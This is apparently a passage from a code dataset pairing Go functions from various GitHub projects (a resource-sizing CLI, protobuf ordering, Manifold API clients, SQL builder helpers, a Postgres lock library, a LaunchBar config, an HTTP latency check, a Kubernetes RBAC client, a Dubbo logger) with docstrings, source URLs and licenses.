iab.nb[offset] |= mask
}
}
return iab
} | Apache License 2.0 |
mhausenblas/right-size-guide | main.go | export | go | func export(ifs, pfs Findings, exportfile, outputformat, target string) {
fs := map[string]Findings{
"idle": ifs,
"peak": pfs,
}
data, err := json.MarshalIndent(fs, "", " ")
if err != nil {
log.Printf("Can't serialize findings: %v\n", err)
}
outputformat = strings.ToLower(outputformat)
switch outputformat {
case "json":
switch {
case exportfile != "":
log.Printf("Exporting findings as JSON to %v", exportfile)
err := ioutil.WriteFile(exportfile, data, 0644)
if err != nil {
log.Printf("Can't export findings: %v\n", err)
}
default:
w := bufio.NewWriter(os.Stdout)
_, err := w.Write(data)
if err != nil {
log.Printf("Can't export findings: %v\n", err)
}
w.Flush()
}
case "openmetrics":
var buffer bytes.Buffer
buffer.WriteString(emito("idle_memory",
"gauge",
"The idle state memory consumption",
fmt.Sprintf("%d", ifs.MemoryMaxRSS),
map[string]string{"target": target, "unit": "kB"}))
buffer.WriteString(emito("idle_cpu_user",
"gauge",
"The idle state CPU consumption in user land",
fmt.Sprintf("%d", ifs.CPUuser),
map[string]string{"target": target, "unit": "microsec"}))
buffer.WriteString(emito("idle_cpu_sys",
"gauge",
"The idle state CPU consumption in the kernel",
fmt.Sprintf("%d", ifs.CPUsys),
map[string]string{"target": target, "unit": "microsec"}))
if pfs.MemoryMaxRSS != 0 {
buffer.WriteString(emito("peak_memory",
"gauge",
"The peak state memory consumption",
fmt.Sprintf("%d", pfs.MemoryMaxRSS),
map[string]string{"target": target, "unit": "kB"}))
buffer.WriteString(emito("peak_cpu_user",
"gauge",
"The peak state CPU consumption in user land",
fmt.Sprintf("%d", pfs.CPUuser),
map[string]string{"target": target, "unit": "microsec"}))
buffer.WriteString(emito("peak_cpu_sys",
"gauge",
"The peak state CPU consumption in the kernel",
fmt.Sprintf("%d", pfs.CPUsys),
map[string]string{"target": target, "unit": "microsec"}))
}
switch {
case exportfile != "":
log.Printf("Exporting findings in OpenMetrics format to %v", exportfile)
err := ioutil.WriteFile(exportfile, buffer.Bytes(), 0644)
if err != nil {
log.Printf("Can't export findings: %v\n", err)
}
default:
w := bufio.NewWriter(os.Stdout)
_, err := w.Write(buffer.Bytes())
if err != nil {
log.Printf("Can't export findings: %v\n", err)
}
w.Flush()
}
default:
log.Printf("Can't export findings, unknown output format selected, please use json or openmetrics")
}
} | export writes the findings to a file or stdout, if exportfile is empty | https://github.com/mhausenblas/right-size-guide/blob/d3774daa0aebc562ebd1e7dcb477d57cd94e4964/main.go#L161-L241 | package main
import (
"bufio"
"bytes"
"encoding/json"
"flag"
"fmt"
"io/ioutil"
"log"
"net/http"
"os"
"os/exec"
"strings"
"syscall"
"time"
)
type Findings struct {
MemoryMaxRSS int64 `json:"memory_in_bytes"`
CPUuser int64 `json:"cpuuser_in_usec"`
CPUsys int64 `json:"cpusys_in_usec"`
}
var (
version = "dev"
commit = "none"
date = "unknown"
)
var icmd, pcmd *exec.Cmd
var idlef, peakf chan Findings
func main() {
flag.Usage = func() {
fmt.Printf("Usage:\n %s --target $BINARY \n [--api-path $HTTP_URL_PATH --api-port $HTTP_PORT --peak-delay $TIME_MS --sampletime-idle $TIME_SEC --sampletime-peak $TIME_SEC --export-findings $FILE --output json|openmetrics]\n", os.Args[0])
fmt.Println("Example usage:\n rsg --target test/test --api-path /ping --api-port 8080 2>/dev/null")
fmt.Println("Arguments:")
flag.PrintDefaults()
}
target := flag.String("target", "", "The filesystem path of the binary or script to assess")
idlest := flag.Int("sampletime-idle", 2, "[OPTIONAL] The time in seconds to perform idle resource usage assessment")
peakst := flag.Int("sampletime-peak", 10, "[OPTIONAL] The time in seconds to perform peak resource usage assessment")
apibaseurl := flag.String("api-baseurl", "http://127.0.0.1", "[OPTIONAL] The base URL component of the HTTP API to use for peak resource usage assessment")
apipath := flag.String("api-path", "", "[OPTIONAL] The URL path component of the HTTP API to use for peak resource usage assessment")
apiport := flag.String("api-port", "", "[OPTIONAL] The TCP port of the HTTP API to use for peak resource usage assessment")
peakdelay := flag.Int("delay-peak", 10, "[OPTIONAL] The time in milliseconds to wait between two consecutive HTTP GET requests for peak resource usage assessment")
exportfile := flag.String("export-findings", "", "[OPTIONAL] The filesystem path to export findings to; if not provided the results will be written to stdout")
outputformat := flag.String("output", "json", "[OPTIONAL] The output format, valid values are 'json' and 'openmetrics'")
showversion := flag.Bool("version", false, "Print the version of rsg and exit")
flag.Parse()
if *showversion {
fmt.Printf("%v, commit %v, built at %v\n", version, commit, date)
os.Exit(0)
}
if len(os.Args) == 0 || *target == "" {
fmt.Printf("Need at least the target program to proceed\n\n")
flag.Usage()
os.Exit(1)
}
isampletime := time.Duration(*idlest) * time.Second
psampletime := time.Duration(*peakst) * time.Second
peakhammerpause := time.Duration(*peakdelay) * time.Millisecond
idlef = make(chan Findings, 1)
peakf = make(chan Findings, 1)
icmd = exec.Command(*target)
pcmd = exec.Command(*target)
ifs := Findings{}
pfs := Findings{}
go assessidle()
<-time.After(isampletime)
log.Printf("Idle state assessment of %v completed\n", *target)
if icmd.Process != nil {
err := icmd.Process.Signal(os.Interrupt)
if err != nil {
log.Fatalf("Can't stop process: %v\n", err)
}
}
ifs = <-idlef
log.Printf("Found idle state resource usage. MEMORY: %vkB CPU: %vms (user)/%vms (sys)",
ifs.MemoryMaxRSS/1000,
ifs.CPUuser/1000,
ifs.CPUsys/1000)
if *apipath != "" && *apiport != "" {
go assesspeak(*apibaseurl, *apiport, *apipath, peakhammerpause)
<-time.After(psampletime)
log.Printf("Peak state assessment of %v completed\n", *target)
if pcmd.Process != nil {
err := pcmd.Process.Signal(os.Interrupt)
if err != nil {
log.Fatalf("Can't stop process: %v\n", err)
}
}
pfs = <-peakf
log.Printf("Found peak state resource usage. MEMORY: %vkB CPU: %vms (user)/%vms (sys)",
pfs.MemoryMaxRSS/1000,
pfs.CPUuser/1000,
pfs.CPUsys/1000)
}
export(ifs, pfs, *exportfile, *outputformat, *target)
}
func assessidle() {
log.Printf("Launching %v for idle state resource usage assessment", icmd.Path)
log.Println("Trying to determine idle state resource usage (no external traffic)")
icmd.Run()
f := Findings{}
if icmd.ProcessState != nil {
f.MemoryMaxRSS = int64(icmd.ProcessState.SysUsage().(*syscall.Rusage).Maxrss)
f.CPUuser = int64(icmd.ProcessState.SysUsage().(*syscall.Rusage).Utime.Usec)
f.CPUsys = int64(icmd.ProcessState.SysUsage().(*syscall.Rusage).Stime.Usec)
}
idlef <- f
}
func assesspeak(apibaseurl, apiport, apipath string, peakhammerpause time.Duration) {
log.Printf("Launching %v for peak state resource usage assessment", pcmd.Path)
log.Printf("Trying to determine peak state resource usage using %v:%v%v", apibaseurl, apiport, apipath)
go stress(apibaseurl, apiport, apipath, peakhammerpause)
pcmd.Run()
f := Findings{}
if pcmd.ProcessState != nil {
f.MemoryMaxRSS = int64(pcmd.ProcessState.SysUsage().(*syscall.Rusage).Maxrss)
f.CPUuser = int64(pcmd.ProcessState.SysUsage().(*syscall.Rusage).Utime.Usec)
f.CPUsys = int64(pcmd.ProcessState.SysUsage().(*syscall.Rusage).Stime.Usec)
}
peakf <- f
}
func stress(apibaseurl, apiport, apipath string, peakhammerpause time.Duration) {
time.Sleep(1 * time.Second)
ep := fmt.Sprintf("%v:%v%v", apibaseurl, apiport, apipath)
log.Printf("Starting to hammer %v every %v", ep, peakhammerpause)
for {
_, err := http.Get(ep)
if err != nil {
log.Println(err)
}
time.Sleep(peakhammerpause)
}
} | Apache License 2.0 |
gaowanliang/lightuploader | vendor/google.golang.org/protobuf/internal/order/range.go | RangeEntries | go | func RangeEntries(es EntryRanger, less KeyOrder, fn VisitEntry) {
if less == nil {
es.Range(fn)
return
}
p := mapEntryPool.Get().(*[]mapEntry)
entries := (*p)[:0]
defer func() {
if cap(entries) < 1024 {
*p = entries
mapEntryPool.Put(p)
}
}()
es.Range(func(k pref.MapKey, v pref.Value) bool {
entries = append(entries, mapEntry{k, v})
return true
})
sort.Slice(entries, func(i, j int) bool {
return less(entries[i].k, entries[j].k)
})
for _, e := range entries {
if !fn(e.k, e.v) {
return
}
}
} | RangeEntries iterates over the entries of es according to the specified order. | https://github.com/gaowanliang/lightuploader/blob/c41dcb1e6afffc046ef25eb17b187a034051e92e/vendor/google.golang.org/protobuf/internal/order/range.go#L84-L115 | package order
import (
"sort"
"sync"
pref "google.golang.org/protobuf/reflect/protoreflect"
)
type messageField struct {
fd pref.FieldDescriptor
v pref.Value
}
var messageFieldPool = sync.Pool{
New: func() interface{} { return new([]messageField) },
}
type (
FieldRanger interface{ Range(VisitField) }
VisitField = func(pref.FieldDescriptor, pref.Value) bool
)
func RangeFields(fs FieldRanger, less FieldOrder, fn VisitField) {
if less == nil {
fs.Range(fn)
return
}
p := messageFieldPool.Get().(*[]messageField)
fields := (*p)[:0]
defer func() {
if cap(fields) < 1024 {
*p = fields
messageFieldPool.Put(p)
}
}()
fs.Range(func(fd pref.FieldDescriptor, v pref.Value) bool {
fields = append(fields, messageField{fd, v})
return true
})
sort.Slice(fields, func(i, j int) bool {
return less(fields[i].fd, fields[j].fd)
})
for _, f := range fields {
if !fn(f.fd, f.v) {
return
}
}
}
type mapEntry struct {
k pref.MapKey
v pref.Value
}
var mapEntryPool = sync.Pool{
New: func() interface{} { return new([]mapEntry) },
}
type (
EntryRanger interface{ Range(VisitEntry) }
VisitEntry = func(pref.MapKey, pref.Value) bool
) | MIT License |
manifoldco/manifold-cli | clients/clients.go | NewConnector | go | func NewConnector(cfg *config.Config) (*conClient.Connector, error) {
u, err := deriveURL(cfg, "connector")
if err != nil {
return nil, err
}
c := conClient.DefaultTransportConfig()
c.WithHost(u.Host)
c.WithBasePath(u.Path)
c.WithSchemes([]string{u.Scheme})
transport := httptransport.New(c.Host, c.BasePath, c.Schemes)
transport.Transport = newRoundTripper(transport.Transport)
authToken := retrieveToken(cfg)
if authToken != "" {
transport.DefaultAuthentication = NewBearerToken(authToken)
}
return conClient.New(transport, strfmt.Default), nil
} | NewConnector returns a new swagger generated client for the Connector service | https://github.com/manifoldco/manifold-cli/blob/35f39e985233bf0e3e858c933c5485bf01335856/clients/clients.go#L168-L188 | package clients
import (
"fmt"
"net/http"
"net/url"
"os"
"github.com/go-openapi/runtime"
httptransport "github.com/go-openapi/runtime/client"
"github.com/go-openapi/strfmt"
"github.com/manifoldco/manifold-cli/config"
aClient "github.com/manifoldco/manifold-cli/generated/activity/client"
bClient "github.com/manifoldco/manifold-cli/generated/billing/client"
cClient "github.com/manifoldco/manifold-cli/generated/catalog/client"
conClient "github.com/manifoldco/manifold-cli/generated/connector/client"
iClient "github.com/manifoldco/manifold-cli/generated/identity/client"
mClient "github.com/manifoldco/manifold-cli/generated/marketplace/client"
pClient "github.com/manifoldco/manifold-cli/generated/provisioning/client"
)
const defaultUserAgent = "manifold-cli"
const EnvManifoldToken string = "MANIFOLD_API_TOKEN"
func newRoundTripper(next http.RoundTripper) http.RoundTripper {
version := config.Version
if version != "" {
version = "-" + version
}
return &roundTripper{
next: next,
userAgent: defaultUserAgent + version,
}
}
type roundTripper struct {
next http.RoundTripper
userAgent string
}
func (rt *roundTripper) RoundTrip(req *http.Request) (*http.Response, error) {
req.Header.Set("User-Agent", rt.userAgent)
return rt.next.RoundTrip(req)
}
func NewIdentity(cfg *config.Config) (*iClient.Identity, error) {
u, err := deriveURL(cfg, "identity")
if err != nil {
return nil, err
}
c := iClient.DefaultTransportConfig()
c.WithHost(u.Host)
c.WithBasePath(u.Path)
c.WithSchemes([]string{u.Scheme})
transport := httptransport.New(c.Host, c.BasePath, c.Schemes)
transport.Transport = newRoundTripper(transport.Transport)
authToken := retrieveToken(cfg)
if authToken != "" {
transport.DefaultAuthentication = NewBearerToken(authToken)
}
return iClient.New(transport, strfmt.Default), nil
}
func NewMarketplace(cfg *config.Config) (*mClient.Marketplace, error) {
u, err := deriveURL(cfg, "marketplace")
if err != nil {
return nil, err
}
c := mClient.DefaultTransportConfig()
c.WithHost(u.Host)
c.WithBasePath(u.Path)
c.WithSchemes([]string{u.Scheme})
transport := httptransport.New(c.Host, c.BasePath, c.Schemes)
transport.Transport = newRoundTripper(transport.Transport)
authToken := retrieveToken(cfg)
if authToken != "" {
transport.DefaultAuthentication = NewBearerToken(authToken)
}
return mClient.New(transport, strfmt.Default), nil
}
func NewBilling(cfg *config.Config) (*bClient.Billing, error) {
u, err := deriveURL(cfg, "billing")
if err != nil {
return nil, err
}
c := bClient.DefaultTransportConfig()
c.WithHost(u.Host)
c.WithBasePath(u.Path)
c.WithSchemes([]string{u.Scheme})
transport := httptransport.New(c.Host, c.BasePath, c.Schemes)
authToken := retrieveToken(cfg)
if authToken != "" {
transport.DefaultAuthentication = NewBearerToken(authToken)
}
return bClient.New(transport, strfmt.Default), nil
}
func NewActivity(cfg *config.Config) (*aClient.Activity, error) {
u, err := deriveURL(cfg, "activity")
if err != nil {
return nil, err
}
c := aClient.DefaultTransportConfig()
c.WithHost(u.Host)
c.WithBasePath(u.Path)
c.WithSchemes([]string{u.Scheme})
transport := httptransport.New(c.Host, c.BasePath, c.Schemes)
authToken := retrieveToken(cfg)
if authToken != "" {
transport.DefaultAuthentication = NewBearerToken(authToken)
}
return aClient.New(transport, strfmt.Default), nil
}
func NewProvisioning(cfg *config.Config) (*pClient.Provisioning, error) {
u, err := deriveURL(cfg, "provisioning")
if err != nil {
return nil, err
}
c := pClient.DefaultTransportConfig()
c.WithHost(u.Host)
c.WithBasePath(u.Path)
c.WithSchemes([]string{u.Scheme})
transport := httptransport.New(c.Host, c.BasePath, c.Schemes)
transport.Transport = newRoundTripper(transport.Transport)
authToken := retrieveToken(cfg)
if authToken != "" {
transport.DefaultAuthentication = NewBearerToken(authToken)
}
return pClient.New(transport, strfmt.Default), nil
} | BSD 3-Clause New or Revised License |
code-hex/sqb | conjunction.go | Or | go | func Or(left, right stmt.Expr, exprs ...stmt.Expr) *stmt.Or {
ret := &stmt.Or{
Left: left,
Right: right,
}
for _, expr := range exprs {
ret = &stmt.Or{
Left: ret,
Right: expr,
}
}
return ret
} | Or creates statement for the OR boolean expression with parentheses.
If you want to know more details, See at stmt.Or. | https://github.com/code-hex/sqb/blob/42b5fcd18eccac19cc6af0d2e079e193a6bfd125/conjunction.go#L34-L46 | package sqb
import (
"sort"
"github.com/Code-Hex/sqb/stmt"
)
func Paren(expr stmt.Expr) *stmt.Paren {
return &stmt.Paren{
Expr: expr,
}
}
func And(left, right stmt.Expr, exprs ...stmt.Expr) *stmt.And {
ret := &stmt.And{
Left: left,
Right: right,
}
for _, expr := range exprs {
ret = &stmt.And{
Left: ret,
Right: expr,
}
}
return ret
} | MIT License |
cirello-io/pglock | errors.go | Unwrap | go | func (err *OtherError) Unwrap() error {
return err.error
} | Unwrap returns the next error in the error chain. | https://github.com/cirello-io/pglock/blob/b7e79115660cde7c524e1b333d56183985a475de/errors.go#L74-L76 | package pglock
import (
"errors"
"fmt"
)
type NotExistError struct {
error
}
func (err *NotExistError) Unwrap() error {
return err.error
}
func (err *NotExistError) Error() string {
return fmt.Sprintf("not exists: %s", err.error)
}
type UnavailableError struct {
error
}
func (err *UnavailableError) Unwrap() error {
return err.error
}
func (err *UnavailableError) Error() string {
return fmt.Sprintf("unavailable: %s", err.error)
}
type FailedPreconditionError struct {
error
}
func (err *FailedPreconditionError) Unwrap() error {
return err.error
}
func (err *FailedPreconditionError) Error() string {
return fmt.Sprintf("failed precondition: %s", err.error)
}
type OtherError struct {
error
} | Apache License 2.0 |
nbjahan/launchbar-livedic | vendor/src/github.com/nbjahan/go-launchbar/config.go | GetInt | go | func (c *Config) GetInt(key string) int64 {
if c.data[key] == nil {
return 0
}
i, ok := c.data[key].(float64)
if !ok {
return 0
}
return int64(i)
} | GetInt gets the value from config for the key as int64 | https://github.com/nbjahan/launchbar-livedic/blob/e318d3264c1d204f95027d44187c27c9f70d6171/vendor/src/github.com/nbjahan/go-launchbar/config.go#L72-L81 | package launchbar
import (
"encoding/json"
"fmt"
"io/ioutil"
"os"
"path"
"time"
)
type ConfigValues map[string]interface{}
type Config struct {
path string
data map[string]interface{}
}
func NewConfig(p string) *Config {
return loadConfig(p)
}
func NewConfigDefaults(p string, defaults ConfigValues) *Config {
config := loadConfig(p)
for k, v := range defaults {
if _, found := config.data[k]; !found {
config.data[k] = v
}
}
config.save()
return config
}
func (c *Config) Delete(keys ...string) {
for _, key := range keys {
delete(c.data, key)
}
c.save()
}
func (c *Config) Set(key string, val interface{}) {
if !path.IsAbs(c.path) || path.Dir(path.Dir(c.path)) != os.ExpandEnv("$HOME/Library/Application Support/LaunchBar/Action Support") {
panic(fmt.Sprintf("bad config path: %q", c.path))
}
c.data[key] = val
c.save()
}
func (c *Config) Get(key string) interface{} {
return c.data[key]
}
func (c *Config) GetString(key string) string {
if c.data[key] == nil {
return ""
}
return fmt.Sprintf("%v", c.data[key])
} | MIT License |
fanpei91/torsniff | vendor/github.com/spf13/pflag/bool.go | BoolVarP | go | func BoolVarP(p *bool, name, shorthand string, value bool, usage string) {
flag := CommandLine.VarPF(newBoolValue(value, p), name, shorthand, usage)
flag.NoOptDefVal = "true"
} | BoolVarP is like BoolVar, but accepts a shorthand letter that can be used after a single dash. | https://github.com/fanpei91/torsniff/blob/e81c7078285c96c91bbbb2f2580199f8f3f61bae/vendor/github.com/spf13/pflag/bool.go#L66-L69 | package pflag
import "strconv"
type boolFlag interface {
Value
IsBoolFlag() bool
}
type boolValue bool
func newBoolValue(val bool, p *bool) *boolValue {
*p = val
return (*boolValue)(p)
}
func (b *boolValue) Set(s string) error {
v, err := strconv.ParseBool(s)
*b = boolValue(v)
return err
}
func (b *boolValue) Type() string {
return "bool"
}
func (b *boolValue) String() string { return strconv.FormatBool(bool(*b)) }
func (b *boolValue) IsBoolFlag() bool { return true }
func boolConv(sval string) (interface{}, error) {
return strconv.ParseBool(sval)
}
func (f *FlagSet) GetBool(name string) (bool, error) {
val, err := f.getFlagType(name, "bool", boolConv)
if err != nil {
return false, err
}
return val.(bool), nil
}
func (f *FlagSet) BoolVar(p *bool, name string, value bool, usage string) {
f.BoolVarP(p, name, "", value, usage)
}
func (f *FlagSet) BoolVarP(p *bool, name, shorthand string, value bool, usage string) {
flag := f.VarPF(newBoolValue(value, p), name, shorthand, usage)
flag.NoOptDefVal = "true"
}
func BoolVar(p *bool, name string, value bool, usage string) {
BoolVarP(p, name, "", value, usage)
} | MIT License |
vdobler/ht | ht/latency.go | quantile | go | func quantile(x []int, p float64) float64 {
if len(x) == 0 {
return 0
}
N := float64(len(x))
if p < 2.0/(3.0*(N+1.0/3.0)) {
return float64(x[0])
}
if p >= (N-1.0/3.0)/(N+1.0/3.0) {
return float64(x[len(x)-1])
}
h := (N+1.0/3.0)*p + 1.0/3.0
fh := math.Floor(h)
xl := x[int(fh)-1]
xr := x[int(fh)]
return float64(xl) + (h-fh)*float64(xr-xl)
} | https://en.wikipedia.org/wiki/Quantile formula R-8 | https://github.com/vdobler/ht/blob/39624426aab937a68ebc9c82a1cab74d7a0d3d24/ht/latency.go#L294-L312 | package ht
import (
"bufio"
"encoding/csv"
"fmt"
"io"
"io/ioutil"
"math"
"os"
"sort"
"strconv"
"strings"
"sync"
"time"
"github.com/vdobler/ht/cookiejar"
"github.com/vdobler/ht/errorlist"
)
func init() {
RegisterCheck(&Latency{})
}
type Latency struct {
N int `json:",omitempty"`
Concurrent int `json:",omitempty"`
Limits string `json:",omitempty"`
IndividualSessions bool `json:",omitempty"`
SkipChecks bool `json:",omitempty"`
DumpTo string `json:",omitempty"`
limits []latLimit
}
type latLimit struct {
q float64
max time.Duration
}
func (L *Latency) Execute(t *Test) error {
var dumper io.Writer
switch L.DumpTo {
case "":
dumper = ioutil.Discard
case "stdout":
dumper = os.Stdout
case "stderr":
dumper = os.Stderr
default:
file, err := os.OpenFile(L.DumpTo, os.O_CREATE|os.O_APPEND|os.O_WRONLY, 0644)
if err != nil {
return err
}
defer file.Close()
buffile := bufio.NewWriter(file)
defer buffile.Flush()
dumper = buffile
}
csvWriter := csv.NewWriter(dumper)
defer csvWriter.Flush()
tests, err := L.produceTestSet(t)
if err != nil {
return err
}
averageRT := L.warmup(tests)
offset := averageRT / time.Duration(L.Concurrent)
conc := L.Concurrent
resultCh := make(chan latencyResult, 3*L.Concurrent)
data := make([]latencyResult, L.N)
done := make(chan bool)
started := time.Now()
go func() {
for i := 0; i < len(data) && time.Since(started) < 3*time.Minute; i++ {
data[i] = <-resultCh
}
close(done)
}()
wg := &sync.WaitGroup{}
for i := 0; i < conc; i++ {
wg.Add(1)
go func(ex *Test, id int) {
for running := true; running; {
ex.Run()
lr := latencyResult{
status: ex.Result.Status,
started: ex.Result.Started,
duration: ex.Response.Duration,
execBy: id,
}
select {
case <-done:
running = false
default:
select {
case resultCh <- lr:
default:
}
}
}
wg.Done()
}(tests[i], i)
time.Sleep(offset)
}
wg.Wait()
var errs errorlist.List
counters := make([]int, Bogus+1)
seen := uint64(0)
for _, res := range data {
counters[res.status]++
seen |= 1 << uint(res.execBy)
}
if counters[NotRun] > 0 {
errs = errs.Append(fmt.Errorf("Check timed out, got only %d measurements",
L.N-counters[NotRun]))
} else if counters[Pass] != L.N {
errs = errs.Append(fmt.Errorf("Got %d Fail, %d Error, %d Bogus",
counters[Fail], counters[Error], counters[Bogus]))
}
if seen != (uint64(1)<<uint(conc))-1 {
errs = errs.Append(fmt.Errorf("Not all %d concurrent workers did provide a result (%x)",
L.Concurrent, seen))
}
if L.DumpTo != "" {
fields := make([]string, 7)
fields[0] = t.Name
fields[1] = fmt.Sprintf("%d", L.Concurrent)
if len(data) == L.N {
fields[2] = "check completed"
} else {
fields[2] = "stopped early"
}
for _, d := range data {
fields[3] = d.status.String()
fields[4] = fmt.Sprintf("%d", d.execBy)
fields[5] = d.started.Format(time.RFC3339Nano)
fields[6] = d.duration.Truncate(10 * time.Microsecond).String()
csvWriter.Write(fields)
}
}
latencies := make([]int, len(data))
for i, r := range data {
latencies[i] = int(r.duration) / int(time.Millisecond)
}
sort.Ints(latencies)
for _, lim := range L.limits {
lat := time.Millisecond * time.Duration(quantile(latencies, lim.q))
t.infof("Latency quantil (conc=%d) %0.2f%% ≤ %d ms",
conc, lim.q*100, lat/time.Millisecond)
if lat > lim.max {
errs = errs.Append(fmt.Errorf("%.2f%% = %s > limit %s",
100*lim.q, lat, lim.max))
}
}
return errs.AsError()
}
func (L *Latency) produceTestSet(t *Test) ([]*Test, error) {
tests := make([]*Test, L.Concurrent)
for i := range tests {
cpy, err := Merge(t)
if err != nil {
return nil, err
}
cpy.Name = fmt.Sprintf("Latency-Test %d", i+1)
checks := []Check{}
for _, c := range t.Checks {
if _, lt := c.(*Latency); L.SkipChecks || lt {
continue
}
checks = append(checks, c)
}
cpy.Checks = checks
cpy.Execution.Verbosity = 0
if t.Jar != nil {
if L.IndividualSessions {
cpy.Jar, _ = cookiejar.New(nil)
} else {
cpy.Jar = t.Jar
}
}
tests[i] = cpy
}
return tests, nil
}
func (L *Latency) warmup(tests []*Test) time.Duration {
wg := &sync.WaitGroup{}
started := time.Now()
prewarmed := 0
for prewarm := 0; prewarm < 2; prewarm++ {
for _, t := range tests {
prewarmed++
wg.Add(1)
go func(ex *Test) {
ex.Run()
wg.Done()
}(t)
}
wg.Wait()
}
return time.Since(started) / time.Duration(prewarmed)
}
type latencyResult struct {
status Status
started time.Time
duration time.Duration
execBy int
} | BSD 3-Clause New or Revised License |
kubernetes-csi/csi-lib-utils | vendor/k8s.io/client-go/kubernetes/typed/rbac/v1alpha1/rolebinding.go | Patch | go | func (c *roleBindings) Patch(ctx context.Context, name string, pt types.PatchType, data []byte, opts v1.PatchOptions, subresources ...string) (result *v1alpha1.RoleBinding, err error) {
result = &v1alpha1.RoleBinding{}
err = c.client.Patch(pt).
Namespace(c.ns).
Resource("rolebindings").
Name(name).
SubResource(subresources...).
VersionedParams(&opts, scheme.ParameterCodec).
Body(data).
Do(ctx).
Into(result)
return
} | Patch applies the patch and returns the patched roleBinding. | https://github.com/kubernetes-csi/csi-lib-utils/blob/a2ccb594bb74b61a0655d3431c6365a6a567c7af/vendor/k8s.io/client-go/kubernetes/typed/rbac/v1alpha1/rolebinding.go#L170-L182 | package v1alpha1
import (
"context"
json "encoding/json"
"fmt"
"time"
v1alpha1 "k8s.io/api/rbac/v1alpha1"
v1 "k8s.io/apimachinery/pkg/apis/meta/v1"
types "k8s.io/apimachinery/pkg/types"
watch "k8s.io/apimachinery/pkg/watch"
rbacv1alpha1 "k8s.io/client-go/applyconfigurations/rbac/v1alpha1"
scheme "k8s.io/client-go/kubernetes/scheme"
rest "k8s.io/client-go/rest"
)
type RoleBindingsGetter interface {
RoleBindings(namespace string) RoleBindingInterface
}
type RoleBindingInterface interface {
Create(ctx context.Context, roleBinding *v1alpha1.RoleBinding, opts v1.CreateOptions) (*v1alpha1.RoleBinding, error)
Update(ctx context.Context, roleBinding *v1alpha1.RoleBinding, opts v1.UpdateOptions) (*v1alpha1.RoleBinding, error)
Delete(ctx context.Context, name string, opts v1.DeleteOptions) error
DeleteCollection(ctx context.Context, opts v1.DeleteOptions, listOpts v1.ListOptions) error
Get(ctx context.Context, name string, opts v1.GetOptions) (*v1alpha1.RoleBinding, error)
List(ctx context.Context, opts v1.ListOptions) (*v1alpha1.RoleBindingList, error)
Watch(ctx context.Context, opts v1.ListOptions) (watch.Interface, error)
Patch(ctx context.Context, name string, pt types.PatchType, data []byte, opts v1.PatchOptions, subresources ...string) (result *v1alpha1.RoleBinding, err error)
Apply(ctx context.Context, roleBinding *rbacv1alpha1.RoleBindingApplyConfiguration, opts v1.ApplyOptions) (result *v1alpha1.RoleBinding, err error)
RoleBindingExpansion
}
type roleBindings struct {
client rest.Interface
ns string
}
func newRoleBindings(c *RbacV1alpha1Client, namespace string) *roleBindings {
return &roleBindings{
client: c.RESTClient(),
ns: namespace,
}
}
func (c *roleBindings) Get(ctx context.Context, name string, options v1.GetOptions) (result *v1alpha1.RoleBinding, err error) {
result = &v1alpha1.RoleBinding{}
err = c.client.Get().
Namespace(c.ns).
Resource("rolebindings").
Name(name).
VersionedParams(&options, scheme.ParameterCodec).
Do(ctx).
Into(result)
return
}
func (c *roleBindings) List(ctx context.Context, opts v1.ListOptions) (result *v1alpha1.RoleBindingList, err error) {
var timeout time.Duration
if opts.TimeoutSeconds != nil {
timeout = time.Duration(*opts.TimeoutSeconds) * time.Second
}
result = &v1alpha1.RoleBindingList{}
err = c.client.Get().
Namespace(c.ns).
Resource("rolebindings").
VersionedParams(&opts, scheme.ParameterCodec).
Timeout(timeout).
Do(ctx).
Into(result)
return
}
func (c *roleBindings) Watch(ctx context.Context, opts v1.ListOptions) (watch.Interface, error) {
var timeout time.Duration
if opts.TimeoutSeconds != nil {
timeout = time.Duration(*opts.TimeoutSeconds) * time.Second
}
opts.Watch = true
return c.client.Get().
Namespace(c.ns).
Resource("rolebindings").
VersionedParams(&opts, scheme.ParameterCodec).
Timeout(timeout).
Watch(ctx)
}
func (c *roleBindings) Create(ctx context.Context, roleBinding *v1alpha1.RoleBinding, opts v1.CreateOptions) (result *v1alpha1.RoleBinding, err error) {
result = &v1alpha1.RoleBinding{}
err = c.client.Post().
Namespace(c.ns).
Resource("rolebindings").
VersionedParams(&opts, scheme.ParameterCodec).
Body(roleBinding).
Do(ctx).
Into(result)
return
}
func (c *roleBindings) Update(ctx context.Context, roleBinding *v1alpha1.RoleBinding, opts v1.UpdateOptions) (result *v1alpha1.RoleBinding, err error) {
result = &v1alpha1.RoleBinding{}
err = c.client.Put().
Namespace(c.ns).
Resource("rolebindings").
Name(roleBinding.Name).
VersionedParams(&opts, scheme.ParameterCodec).
Body(roleBinding).
Do(ctx).
Into(result)
return
}
func (c *roleBindings) Delete(ctx context.Context, name string, opts v1.DeleteOptions) error {
return c.client.Delete().
Namespace(c.ns).
Resource("rolebindings").
Name(name).
Body(&opts).
Do(ctx).
Error()
}
func (c *roleBindings) DeleteCollection(ctx context.Context, opts v1.DeleteOptions, listOpts v1.ListOptions) error {
var timeout time.Duration
if listOpts.TimeoutSeconds != nil {
timeout = time.Duration(*listOpts.TimeoutSeconds) * time.Second
}
return c.client.Delete().
Namespace(c.ns).
Resource("rolebindings").
VersionedParams(&listOpts, scheme.ParameterCodec).
Timeout(timeout).
Body(&opts).
Do(ctx).
Error()
} | Apache License 2.0 |
mosn/pkg | registry/dubbo/common/logger/logger.go | SetLoggerLevel | go | func SetLoggerLevel(level string) bool {
if l, ok := logger.(OpsLogger); ok {
l.SetLoggerLevel(level)
return true
}
return false
} | SetLoggerLevel use for set logger level | https://github.com/mosn/pkg/blob/96b01e984d6257832ebc21cc6934232e1f97a35c/registry/dubbo/common/logger/logger.go#L131-L137 | package logger
import (
"io/ioutil"
"path"
"github.com/dubbogo/getty"
perrors "github.com/pkg/errors"
"go.uber.org/zap"
"go.uber.org/zap/zapcore"
"gopkg.in/yaml.v2"
)
var (
logger Logger
)
type DubboLogger struct {
Logger
dynamicLevel zap.AtomicLevel
}
type Logger interface {
Info(args ...interface{})
Warn(args ...interface{})
Error(args ...interface{})
Debug(args ...interface{})
Infof(fmt string, args ...interface{})
Warnf(fmt string, args ...interface{})
Errorf(fmt string, args ...interface{})
Debugf(fmt string, args ...interface{})
}
func InitLog(logConfFile string) error {
if logConfFile == "" {
InitLogger(nil)
return perrors.New("log configure file name is nil")
}
if path.Ext(logConfFile) != ".yml" {
InitLogger(nil)
return perrors.Errorf("log configure file name{%s} suffix must be .yml", logConfFile)
}
confFileStream, err := ioutil.ReadFile(logConfFile)
if err != nil {
InitLogger(nil)
return perrors.Errorf("ioutil.ReadFile(file:%s) = error:%v", logConfFile, err)
}
conf := &zap.Config{}
